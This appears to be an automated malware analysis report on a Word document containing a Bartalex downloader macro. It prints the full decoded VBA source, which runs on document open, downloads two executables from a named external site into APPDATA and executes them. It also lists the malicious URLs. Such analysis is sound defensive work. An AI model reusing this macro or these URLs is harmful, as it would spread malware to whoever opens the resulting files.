Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f39e9d915b5fec46…

MALICIOUS

Office (OOXML)

27.6 KB Created: 2014-12-06 05:47:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-23
MD5: 62d46d126f6bc8213e9b12a5348b7550 SHA-1: 6a1d6286e12feefaf9ba6a9d810ed3e51e4c5462 SHA-256: f39e9d915b5fec4633c7b7df0eeb3c4822bf67ef4659624b73633be38dd2094b
238 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros that instruct the user to enable content, claiming the document is blurred for security. The VBA script utilizes URLDownloadToFile to download executables from 'http://www.net5imarketing.com/new/img/1/explorer.exe' and 'http://www.net5imarketing.com/new/img/1/windows.exe' to the user's APPDATA directory as 'blah.exe' and 'blah2.exe' respectively. It then attempts to execute these downloaded files.

Heuristics 7

  • ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    path1 = Environ("APPDATA") & "blah.exe"
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.net5imarketing.com/new/img/1/explorer.exe Referenced by macro
    • http://www.net5imarketing.com/new/img/1/windows.exeReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1616 bytes
SHA-256: d0d568490bc02fa28d0a28cd6db9ed1a6d9c1b0565e8501dfd569a280e3aed36
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Private Sub Document_Open()
ChangeNumbers
End Sub

Sub ChangeNumbers()
Dim url1 As String, url2 As String, url3 As String, url4 As String, path1 As String, path2 As String, path3 As String, path4 As String
path1 = Environ("APPDATA") & "blah.exe"
path2 = Environ("APPDATA") & "blah2.exe"
path3 = Environ("appdata") & "blah3.exe"
path4 = Environ("appdata") & "blah4.exe"

url1 = "http://www.net5imarketing.com/new/img/1/explorer.exe"
url2 = "http://www.net5imarketing.com/new/img/1/windows.exe"
url3 = "DownloadLinkHere"
url4 = "DownloadLinkHere"


ChangeText url1, path1
ChangeText url2, path2
ChangeText url3, path3
ChangeText url4, path4


End
Exit Sub
End Sub

Sub ChangeText(ByVal a, b As String)
URLDownloadToFile 0, a, b, 0, 0
ShellExecute 0, "open", b, "", vbNullString, vbNormalFocus
Exit Sub
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 10240 bytes
SHA-256: 57cf146e600e6246c108d8c03d15ea2dbe1d0159009bf34854ab2d27f573fa2b
Detection
ClamAV: Doc.Downloader.Bartalex-6755229-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.